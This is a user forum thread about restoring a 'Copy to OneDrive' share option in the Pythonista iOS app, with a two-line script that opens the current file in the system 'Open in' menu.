Sorry I should have been clearer, it was through the Share sheet (that wrench thing) It was there, now it is not, but everything else is still there and I now have to email it to myself so I can use the scripts on another machine... And the iCloud thing... which I don't use, is gone as well. gist is there, but basically putting anything onto a shared storage space that I can use on multiple platforms is gone.
PS yes it works with other applications... and I did nothing special to get the previous pythonista to recognize it... I find a lot of things on the iPad just appear/happen automagically which in most circumstances is ok.
Were you using 1.4 or 1.5? I thought most of the share sheet options got removed at apple's demand in 1.5
@JonB I can't remember which version since I only bought it last year. No biggie, it is just a pain emailing stuff to myself rather than using a shared drive.
It's relatively easy to get this functionality back. Here's how:
- Create a new script, and call it something like "Open in"
- Paste the following code:
import console, editor console.open_in(editor.get_path())
- Tap the "wrench" icon
- Tap Edit inside the "wrench" menu, then the (+) button that appears
- Optionally select a nice icon and color for your action
- Tap Done
A "Copy to OneDrive" option should appear in the menu that pops up when you select the new editor action you created.
brilliant! worked like a charm... I even sent it to myself via OneDrive so I don't forget again. | https://forum.omz-software.com/topic/2719/file-sharing-and-storage-to-onedrive | CC-MAIN-2017-26 | refinedweb | 382 | 81.83 |
Channel management
Channel is a mechanism by which messages are always published. You don't have to define channels in advance; the act of publishing a message creates the channel if it doesn't already exist.
PubNub supports an unlimited number of channels. A channel name can be any alphanumeric string up to 92 characters. There are a few invalid characters, and some that are reserved for special features.
Refer to Channels section to learn more.
Channel TypesChannel Types
Channels represent any place where messages are sent and received. For example, a channel meant for 1-to-1 direct chat simply means that there are only two users using that channel. A group channel means there are two or more users using that channel.
Direct channels for one-to-one messaging between two users. You can make these channels private to keep the messages secure between the users.
Group channels for many-to-many messaging between multiple users. For instance, a chat room for your family, or for a group of friends. You can make these channels made public to allow anyone to join, or make them private and only allow select users to join them.
Broadcast channels for announcements, polls, and other situations in which you want to broadcast messages in a one-to-many arrangement.
Unicast channels for poll responses, sensor inputs, location data, and other situations in which you want to aggregate messages in a many-to-one arrangement.
You can secure your channels by controlling the access to them using PubNub Access Manager which is discussed in User Permissions. With Access Manager disabled, any client can freely send and receive messages on any channel. This is fine while you're learning to use PubNub but eventually, you'll need to secure your channels.
Channel NamesChannel Names
A channel name can be any alphanumeric string up to 92 UTF-8 characters. Channel names are unique per PubNub key, and you can have the same name in another key, even within the same PubNub account. In other words, a PubNub key is a namespace for your channels.
Invalid CharactersInvalid Characters
, : * / \ and Unicode Zero, whitespace, and non-printable ASCII characters.
Valid CharactersValid Characters
_ - = @ . ! $ # % & ^ ;
A period (.) is valid, however it's a special character that is used for wildcard features and is encouraged to be used strategically to leverage these features: wildcard channel subscribe, wildcard channel granting, and Function wildcard channel binding. | https://www.pubnub.com/docs/chat/features/channels | CC-MAIN-2021-17 | refinedweb | 403 | 55.84 |
Various Samsung Exynos based smartphones use a proprietary bootloader named SBOOT. It is the case for the Samsung Galaxy S7, Galaxy S6 and Galaxy A3, and probably many more smartphones listed on Samsung Exynos Showcase [1]. I had the opportunity to reverse engineer pieces of this bootloader while assessing various TEE implementations. This article is the first from a series about SBOOT. It recalls some ARMv8 concepts, discusses the methodology I followed and the right and wrong assumptions I made while analyzing this undocumented proprietary blob used on the Samsung Galaxy S6.
Context
Lately, I have been lucky enough to assess and to hunt bugs in several implementations of Trusted Execution Environment (TEE) as my day job. As a side project, I began to dig into more TEE implementations, especially on smartphones I had, for personal use or at work and, coincidentally, they come from the same software editor, namely Trustonic [2], co-founded by ARM, G&D and Gemalto. Being Exynos-based is the only common characteristic between the smartphones I had at hand.
Trustonic's TEE, named <t-base, has evolved from Mobicore, G&D's former TEE. To my knowledge, very little public technical information exists on this TEE or its former version. Analyzing it suddenly became way more challenging and more interesting than I initially thought. Let's focus on Samsung Galaxy S6 and investigate further!
While identifying trusted applications on the file system was the easiest part of the challenge, looking for the TEE OS on Exynos smartphones I analyzed is comparable to looking for a needle in a haystack. Indeed, the dedicated partition storing the image of the TEE OS that you can find on some smartphones (on Qualcomm based SoC for instance), cannot be found. It must be stored somewhere else, probably in the bootloader itself, and it is the reason why I started to reverse engineer SBOOT. This article is the first of a series narrating my journey to the TEE OS. I am going to focus on how to determine Samsung S6 SBOOT's base address and load it in IDA.
ARMv8 Concepts
Before launching IDA Pro, let me recall some fundamentals of ARMv8. I'll introduce here several concepts that might be useful to people new to ARMv8 and already used to ARMv7. For a precise and complete documentation, refer to ARMv8 Programmer's Guide [3]. As I am no ARMv8 expert, feel free to add comments if you see any mistake or needed precision.
Exception Levels
ARMv8 has introduced a new exception model by defining the concept of exception levels. An exception level determines the privilege level (PL0 to PL3) at which software components run and processor modes (non-secure and secure) to run it. Execution at ELn corresponds to privilege PLn and, the greater the n is, the more privileges an execution level has.
Exception Vector Table
When an exception occurs, the processor branches to an exception vector table and runs the corresponding handler. In ARMv8, each exception level has its own exception vector table. For those who are used to reverse engineer ARMv7 bootloaders, you will notice that its format is totally different from ARMv7:
The astute reader may have noticed that entries of the exception vector table are 128 (0x80) bytes long on ARMv8, whereas each entry is only 4 bytes wide on ARMv7, and each entry holds a sequence of exception handling instructions. While the location of the exception vector table is determined by VTOR (Vector Table Offset Register) on ARMv7, ARMv8 uses three VBARs (Vector Based Address Registers) VBAR_EL3, VBAR_EL2 and VBAR_EL1. Note that, for a specific level, the handler (or the table entry) that is going to be executed depends on:
-).
A software component running at a specific level can interact with software running at the underlying exception levels with dedicated instructions. For instance, a user-mode process (EL0) does a system call handled by the kernel (EL1) by issuing Supervisor Calls (SVC), the kernel can interact with an hypervisor (EL2) with Hypervisor Calls (HVC) or, directly with the secure monitor (EL3) doing Secure Monitor Calls (SMC), etc. These service calls generate synchronous exceptions handled by one of the exception vector table synchronous handlers.
Enough architectural insights for this article, I will write more about this in the upcoming articles. Let us try to load SBOOT into IDA Pro and try to reverse engineer it.
Disassembling SBOOT
To the best of my knowledge, SBOOT uses a proprietary format that is not documented.
The Samsung Galaxy S6 is powered by 1.5GHz 64-bit octa-core Samsung Exynos 7420 CPU. Recall that ARMv8 processors can run applications built for AArch32 and AArch64. Thus, one can try to load SBOOT as a 32-bit or a 64-bit ARM binary.
I assumed that the BootROM had not switched to AArch32 state and loaded it first into IDA Pro as a 64-bit binary, leaving the default options:
- Processor Type: ARM Little Endian [ARM]
- Disassemble as 64-bit code: Yes
Many AArch64 instructions were automatically recognized. When poking around disassembled instructions, basic blocks made sense, letting me think that I really dealt with AArch64 code:
Determining the Base Address
It took me a few days to determine the right base address. As giving you directly the solution is pointless, I first detail all the things I have tried until making the correct assumption which gave me the right base address. As the proverb says, whoever [4] wrote this: "Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime".
Web Search
I started by searching for Samsung bootloader and SBOOT related work on several search engines. Unfortunately, results on the subject were scarce and only one reverseengineering.stackexchange.com thread [5] dating back to March 2015 was relevant.
This thread mainly gives us 2 hints. J-Cho had the intuition that the bootloader starts at the file offset 0x3F000 and Just helping suggests that it is actually starting at 0x10.
As I wanted to dismiss my hypothesis that the bootloader base address is 0x00000000 and that its code always begins at 0x10, I started to look for bootloaders used in other Exynos smartphones. SBOOT in Meizu's smartphones does not give valid instructions at 0x10, confirming my doubts:
I also analyzed if there were any debug string left on other bootloaders that would give me hints on where SBOOT is generally loaded in memory. No luck :( But I got another lead: some strings in Meizu's SBOOT suggested that U-Boot is used. Even if U-Boot is not used on Samsung Galaxy S6, it was a lead worth exploring and I started to dig further.
U-Boot Repository
U-Boot is open-source and supports several Exynos chips. For instance, Exynos 4 and Exynos 5 have been supported for more than 5 years now. Support for the Exynos 7 has not fully landed on the mainline yet but, based on their mailing list [6], some patches exist for the Exynos 7 ESPRESSO development board.
I may have missed it, but going through patches for the ESPRESSO development board did not bear fruits :( I tried multiple known base addresses from Exynos 4 to Exynos 7 boards without succeeding. It was time to try another angle.
ARM Literal Pools
If you are used to reverse engineering ARM assembly, you must have noticed the massive use of literal pools to hold certain constant values that are to be loaded into registers. This property may help us to find approximately where SBOOT is loaded, especially when a branch destination address is loaded from a literal pool.
I searched all the branching instructions marked with errors in operands (highlighted in red) by IDA Pro. As the code of a bootloader is self-contained, I can safely assume that most of the branches destination address must target code in the bootloader itself. With this assumption, I could approximate the bootloader's base address.
From the very first instructions, I noticed the following branching errors:
The interesting facts on these code fragments are:
- Branching instructions BR (Branch to register) are unconditional and suggest that it will not return.
- The operand value for both branches is the same (0x2104010) and, it is located very early in the bootloader.
- The last byte is 0x10 which is exactly the offset where the code of the bootloader seems to begin.
I arbitrarily assumed that the address 0x2104010 was a reset address and I tried to load the SBOOT binary at 0x2104000, with the following options:
- Processor Type: ARM Little Endian [ARM]
- Start ROM Address: 0x2104000
- Disassemble as 64-bit code: Yes
At least, IDA Pro found fewer errors which indicates that my assumption may be correct. Yet, I could not tell for sure that this base address was the right one, I needed to reverse engineer further to be sure. Spoiler: I nearly got it right :)
ARM System Registers
Now that I may have the potential base address, I continued reverse engineering SBOOT hoping that there were no anomalies in the code flow.
As I wanted to find the TEE OS, I started searching for pieces of code executed in the secure monitor. A rather simple technique to find the secure monitor consists in looking for instructions that set or read registers that can only be accessed from the secure monitor. As previously mentioned, the secure monitor runs in EL3. VBAR_EL3 is rather a good candidate to find EL3 code as it holds the base address of the EL3 exception vector table and leads to SMC handlers.
Do you remember the exception vector table's format presented at the beginning of this article? It is made of 16 entries of 0x80 bytes holding the code of exception handlers. Amongst the search results, code at 0x2111000 seemed to lead to a valid exception vector table:
Even though, the chosen base address was still not the right one :( When verifying other instructions that set VBAR_EL3, one can note that 0x210F000 is in the middle of a function:
These anomalies would suggest that 0x2104000 is not the right base address yet. Let us try something else.
Service Descriptors
Samsung Galaxy S6 SBOOT is partly based on ARM Trusted Firmware [7]. ARM Trusted Firmware is open-source and provides a reference implementation of secure world software for ARMv8-A, including a Secure Monitor executing at Exception Level 3 (EL3). The assembly code corresponding to the secure monitor is exactly the same as the one in ARM Trusted Firmware. This is good news because it will buy me some time and save me reverse engineering efforts.
I tried to find another anchor point in the disassembled code I could use to determine the base address of SBOOT. Members of type char * in structures are particularly interesting candidates as they point to strings whose addresses are defined at compile time. While comparing SBOOT disassembled code and ARM Trusted Firmware source code, I identified a structure, rt_svc_desc_t, that had the property I was looking for:
typedef struct rt_svc_desc { uint8_t start_oen; uint8_t end_oen; uint8_t call_type; const char *name; rt_svc_init_t init; rt_svc_handle_t handle; } rt_svc_desc_t;
According to ARM Trusted Firmware's source code, rt_svc_descs is an array of rt_svc_desc_t that holds the runtime service descriptors exported by services. It is used in the function runtime_svc_init which can be easily located in SBOOT thanks to debug strings in its calling function bl31_main:
I tried to map the binary at different addresses and checked whether I could find valid strings for rt_svc_desc.name entries. Here is a small bruteforcing script:
import sys import string import struct RT_SVC_DESC_FORMAT = "BBB5xQQQ" RT_SVC_DESC_SIZE = struct.calcsize(RT_SVC_DESC_FORMAT) RT_SVC_DESC_OFFSET = 0xcb50 RT_SVC_DESC_ENTRIES = (0xcc10 - 0xcb50) / RT_SVC_DESC_SIZE if len(sys.argv) != 2: print("usage: %s <sboot.bin>" % sys.argv[0]) sys.exit(1) sboot_file = open(sys.argv[1], "rb") sboot_data = sboot_file.read() rt_svc_desc = [] for idx in range(RT_SVC_DESC_ENTRIES): start = RT_SVC_DESC_OFFSET + (idx << 5) desc = struct.unpack(RT_SVC_DESC_FORMAT, sboot_data[start:start+RT_SVC_DESC_SIZE]) rt_svc_desc.append(desc) strlen = lambda x: 1 + strlen(x[1:]) if x and x[0] in string.printable else 0 for base_addr in range(0x2100000, 0x21fffff, 0x1000): names = [] print("[+] testing base address %08x" % base_addr) for desc in rt_svc_desc: offset = desc[3] - base_addr if offset < 0: sys.exit(0) name_len = strlen(sboot_data[offset:]) if not name_len: break names.append(sboot_data[offset:offset+name_len]) if len(names) == RT_SVC_DESC_ENTRIES: print("[!] w00t!!! base address is %08x" % base_addr) print(" found names: %s" % ", ".join(names))
Running this script on the analyzed SBOOT gave the following output:
$ python bf_sboot.py sboot.bin [+] testing base address 02100000 [+] testing base address 02101000 [+] testing base address 02102000 [!] w00t!!! base address is 02102000 found names: mon_smc, std_svc, tbase_dummy_sip_fastcall, tbase_oem_fastcall, tbase_smc, tbase_fastcall [...]
Victory! Samsung Galaxy S6 SBOOT's base address is 0x02102000. Reloading the binary into IDA Pro with this base address seems to correct all the oddities in the disassembled code I have seen so far. We are sure to have the right one now!
Enhancing the Disassembly
The reverse engineering process is like solving a puzzle. One tries to understand how a piece of software works by putting back together bits of information. Thus, the more information you have, the easier the puzzle solving is. Here are some tips that helped me before and after finding the right base address.
Missed Functions
While IDA Pro does an excellent job in disassembling common file formats, it will likely miss a lot of functions when reversing unknown binaries. In this situation, a common habit is to write a script looking for prologue instructions and declaring that a function exists at these spots. A simple AArch64 function prologue looks like this:
// AArch64 PCS assigns the frame pointer to x29 sub sp, sp, #0x10 stp x29, x30, [sp] mov x29, sp
The instruction mov x29, sp is a rather reliable marker for AArch64 prologues. The idea to find the beginning of the function is to search for this marker and to disassemble backward while common prologue instructions (mov, stp, sub for instance) are found. A function that searches for AArch64 prologues looks like this in IDA Python:
import idaapi def find_sig(segment, sig, callback): seg = idaapi.get_segm_by_name(segment) if not seg: return ea, maxea = seg.startEA, seg.endEA while ea != idaapi.BADADDR: ea = idaapi.find_binary(ea, maxea, sig, 16, idaapi.SEARCH_DOWN) if ea != idaapi.BADADDR: callback(ea) ea += 4 def is_prologue_insn(ea): idaapi.decode_insn(ea) return idaapi.cmd.itype in [idaapi.ARM_stp, idaapi.ARM_mov, idaapi.ARM_sub] def callback(ea): flags = idaapi.getFlags(ea) if idaapi.isUnknown(flags): while ea != idaapi.BADADDR: if is_prologue_insn(ea - 4): ea -= 4 else: print("[*] New function discovered at %#lx" % (ea)) idaapi.add_func(ea, idaapi.BADADDR) break if idaapi.isData(flags): print("[!] %#lx needs manual review" % (ea)) mov_x29_sp = "fd 03 00 91" find_sig("ROM", mov_x29_sp, callback)
ARM64 IDA Plugins
AArch64 mov simplifier
Compilers sometimes optimize code, making it harder to read for a human. Using IDA Pro's API, one can write an architecture-specific code simplifier. I found the AArch64 code simplifier shared by @xerub quite useful. Here is an example of AArch64 disassembly:
ROM:0000000002104200 BL sub_2104468 ROM:0000000002104204 MOV X19, #0x814 ROM:0000000002104208 MOVK X19, #0x105C,LSL#16 ROM:000000000210420C MOV X0, X19
@xerub's "AArch64 mov simplifier" [8] changes the disassembly as follows:
ROM:0000000002104200 BL sub_2104468 ROM:0000000002104204 MOVE X19, #0x105C0814 ROM:000000000210420C MOV X0, X19
Astute readers will probably notice that MOVE isn't a valid ARM64 instruction. MOVE is simply a marker to tell the reverse engineer that current instructions have been simplified and substituted by this instruction.
FRIEND
Reverse engineering ARM low-level code in IDA Pro has always been tedious. Figuring out what an instruction related to the system control coprocessor does is a horrible experience as IDA Pro disassembles the instruction without register aliasing. If you had the choice, which one would you prefer to read:
msr vbar_el3, x0
or
msr #6, c12, c0, #0, x0
ARM helper plugins help in improving IDA Pro's disassembly. IDA AArch64 Helper Plugin [9] by Stefan Esser (@i0n1c) is such a plugin. Unfortunately, it is not publicly available. Alex Hude (@getorix) wrote a similar plugin, FRIEND [10], for MacOS. If you closely followed the project, I recently pushed modifications [11], that had been merged last week, to make it cross-platform. Now, you have FRIENDs for Windows, Linux, and MacOS :)
Signatures
As previously mentioned, SBOOT is partly based on ARM Trusted Firmware [12]. Since the source code is available, one can save a lot of reverse engineering efforts by browsing the source code, recompiling it and do binary diffing (or signature matching) in order to recover as much symbols as possible.
I generally combine multiple binary diffing tools to propagate symbols between binaries:
- Rizzo [13] from Craig Heffner (devttys0)
- Bindiff [14] from Zymanics
- Diaphora [15] from Joxean Koret (@matalaz)
They sometimes have complementary results.
Conclusion
In this article, I described how to determine SBOOT's base address for the Samsung Galaxy S6 and how to load it into IDA Pro. The method described here should be applicable to other Samsung's smartphones and probably to other manufacturers' products using an Exynos SoC.
The journey to the TEE OS will continue in the next article. Stay tuned folks!
References
Acknowledgements
- jb for all the discussions we had and for his help.
- André "sh4ka" Moulu for encouraging me to write this series of articles, describing my journey to the TEE OS.
- Quarkslab colleagues for their feedback on this article. | https://blog.quarkslab.com/reverse-engineering-samsung-s6-sboot-part-i.html | CC-MAIN-2019-09 | refinedweb | 2,910 | 52.19 |
All users were logged out of Bugzilla on October 13th, 2018
Assert that placeholders are reflowed before their out-of-flows
RESOLVED FIXED in mozilla24
Status
()
People
(Reporter: bzbarsky, Assigned: dholbert)
Tracking
(Depends on: 1 bug)
Bug Flags:
Firefox Tracking Flags
(Not tracked)
Details
Attachments
(2 attachments, 2 obsolete attachments)
This came up in bug 851514. We should assert when a placeholder gets its first reflow after the out-of-flow's first reflow.
Status: NEW → ASSIGNED
OS: Mac OS X → All
Hardware: x86 → All
Version: unspecified → Trunk
Created attachment 752232 [details] [diff] [review] patch v1: Assert that placeholders are reflowed before their out-of-flows.
So with that patch, I hit asserts at least on the following (I say at least, because the fatal assert kills the test run): Mochitest: layout/generic/test/test_bug394239.html Reftest: layout/reftests/abs-pos/continuation-positioned-inline-1.html Crashtest: layout/base/crashtests/310638-2.html All seem to involve rel-pos inlines with continuations and the like with abs-pos kids. Which is not surprising: the placeholder might be in a later continuation while the abs-pos kid is parented to the first continuation and reflows when that reflows. In other words, things like bug 489100, bug 489207, bug 490216, bug 507307, bug 629059, bug 667079 ...
Assignee: bzbarsky → nobody
Status: ASSIGNED → NEW
Hmm, OK. So in cases where the placeholder is in a continuation, then this is something that's allowed to happen. Would it make sense to stick this in #ifdef DEBUG and do something like if (none of the frames in my ancestor chain have previous continuations) { [assertion goes here] } ?
Well, it's allowed to happen now. It's buggy if it happens.... We could do something like that; a bit worried about the overhead.
Yeah, the overhead would be debug-only but still a little sucky. This would avoid the overhead, except in the cases where we're buggy): #ifdef DEBUG if (placeholder is being reflowed after it's OOF) { // Buggy! if (any of my ancestors is a continuation) { // Just a warning because we have tests that trigger this, unfortunately: NS_WARNING("placeholder getting its first reflow after its OOF frame"); } else { NS_ERROR("placeholder getting its first reflow after its OOF frame"); } } #endif I'll spin up a patch to do that.
Created attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation Here's a patch along the lines of my previous comment. Try run:
Comment on attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation Yay, Try likes this. Requesting review.
Attachment #752571 - Flags: review?(bzbarsky)
I verified that this asserts on bug 851514's testcase if I back out its patch, too. (as we'd hope)
Comment on attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation r=me
Attachment #752571 - Flags: review?(bzbarsky) → review+
Assignee: nobody → dholbert
Status: NEW → ASSIGNED
Flags: in-testsuite-
Backed out in because layout/generic/crashtests/656130-2.html and layout/generic/crashtests/660451-1.html both say "dude, that's totally normal to us, we reflow our out-of-flows before our placeholders twice every single time we're run!"
d'oh. I forgot to include crashtests in the Try run. Thanks, philor.
needinfo=me to investigate
Flags: needinfo?
Flags: needinfo? → needinfo?(dholbert)
(BTW, the two failing crashtests are actually identical (md5sum and all). I just opened bug 876194 to clean that up.)
Flags: needinfo?(dholbert)
Created attachment 754228 [details] breaktest 1 Here's a reduced static testcase that triggers the NS_ERROR in the formerly-landed patch.
So we're failing the assertion in cases where there's an IB split, and the abspos frame falls in an IB sibling before its placeholder. I think this is a situation like comment 2 (but with IB siblings instead of continuations). We could probably just extend the patch's existing exemption for continuations to cover IB siblings, too.
Created attachment 754229 [details] [diff] [review] patch v3: add IB-split siblings to exemption This changes the existing "isInContinuation" exemption to "isInContinuationOrIBSplit". The point is to check for cases where the placeholder is in a later continuation or a later IB-split sibling than its out-of-flow, and only warn in those cases.
Attachment #754229 - Flags: review?(bzbarsky)
Attachment #754229 - Attachment description: add IB siblings to exemption → patch v3: add IB-split siblings to exemption
Attachment #752571 - Attachment description: assert or warn, depending on whether we're in a continuation → patch v2: assert or warn, depending on whether we're in a continuation
Attachment #752571 - Attachment is obsolete: true
Attachment #752232 - Attachment description: Assert that placeholders are reflowed before their out-of-flows. → patch v1: Assert that placeholders are reflowed before their out-of-flows.
Attachment #752232 - Attachment is obsolete: true
Comment on attachment 754229 [details] [diff] [review] patch v3: add IB-split siblings to exemption Might be worth it to put a GetPrevContinuationOrSpecialSibling on nsLayoutUtils (similar to the GetNext... method already there) and use it here. If we do that, we should check for the NS_FRAME_IS_SPECIAL flag. r=me either way
Attachment #754229 - Flags: review?(bzbarsky) → review+
I'll keep it simple & leave it as-is for now, especially since this check is just there as a hackaround for another bug. But I'll add a comment saying something like: // (This could eventually nsLayoutUtils::GetPrevContinuationOrSpecialSibling(), // if we ever add a function like that.) so that if someone adds that function for other reasons, they might find & simplify this code.
> // (This could eventually nsLayoutUtils::GetPrevContinuationOrSpecialSibling(), (er, s/eventually/eventually call/) Looks like inbound is hosed, so I'll land this tomorrow.
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24 | https://bugzilla.mozilla.org/show_bug.cgi?id=874418 | CC-MAIN-2018-43 | refinedweb | 966 | 53 |
Hi there
I wanna This is a "test". C code
Thanks alot
Test what, our patience? Seriously, even if anyone here were inclined to simply provide code to you - which we are not - you would need to give a lot more detail about what you need.
One of the forum rules states that, when posting for help with a program, you must demonstrate due diligence - you need to show that you have made a good-faith effort to solve the problem yourself, and that you have reached an impasse you can't reslove. In other words, show us your code. If you don't have any code to show us, tell us what you need help in doing. Make an effort first, before asking for a hand-out.
Hi there
No.
I'll write that program or you, after I see you have depposited $1,000.00 USD in my PayPal account.
Edited 4 Years Ago
by Ancient Dragon
#include <stdio.h>
main()
{
printf("this is a %s",""test"");
return0;
}
The main purpose is to show "test" in output
is this true?
The main purpose is to show "test" in output
The main purpose is to show "test" in output
Presumably the purpose is to show 'this is a "test"' as the output. Unfortunately, the code is wrong even if you exclude the syntax error in your return statement. You must escape double quotes in a string:
printf("this is a %s", "\"test\"");
string sentence="This is a test";
printf("%s",&sentence);
//maybe these will. ... | https://www.daniweb.com/programming/software-development/threads/452528/c-code-request | CC-MAIN-2017-26 | refinedweb | 255 | 80.51 |
.
Background
An increasingly popular alternative to XML is JSON (JavaScript Object Notation). It is a simplistic text-based format that is designed to be human readable. Unlike XML, it has no notion of namespaces and can only represent data in the format of associative arrays.
Retrieving JSON
All Data APIs support JSON output through the use of the
alt parameter. For example, you can retrieve the current most popular videos from YouTube in JSON format as follows:
Using the Data API with JavaScript
When you are working with JavaScript, you can avoid crossdomain restrictions by loading results from the Data API through a
<script> tag with a custom callback. To do this you set the
alt parameter to have the value
json-in-script and also use the
callback parameter to identify what JavaScript function should be called once the results have been loaded.
A simple example is retrieving all of the uploads for a particular user, in this case 'GoogleDevelopers':
<script type="text/javascript" src=""> </script>
The
v parameter ensures we are using Version 2 of the API. The
format parameter ensures we are only retrieving videos that can be embedded in an external webpage. The
callback parameter is specifying
showMyVideos as the function to execute once the results are returned. This function could look something like:
function showMyVideos(data) { var feed = data.feed; var entries = feed.entry || []; var html = ['<ul>']; for (var i = 0; i < entries.length; i++) { var entry = entries[i]; var title = entry.title.$t; html.push('<li>', title, '</li>'); } html.push('</ul>'); document.getElementById('videos').innerHTML = html.join(''); }
This code inserts an unordered list of videos into a <div> (or other block-level element) with the id of "videos" on the page. Each list item will be the video's title.
Of course there is much more you can do, such as showing a thumbnail for the video or using it with our Player APIs. For more examples and code check out the YouTube JSON codelab. | https://developers.google.com/youtube/2.0/developers_guide_json | CC-MAIN-2016-36 | refinedweb | 331 | 62.48 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.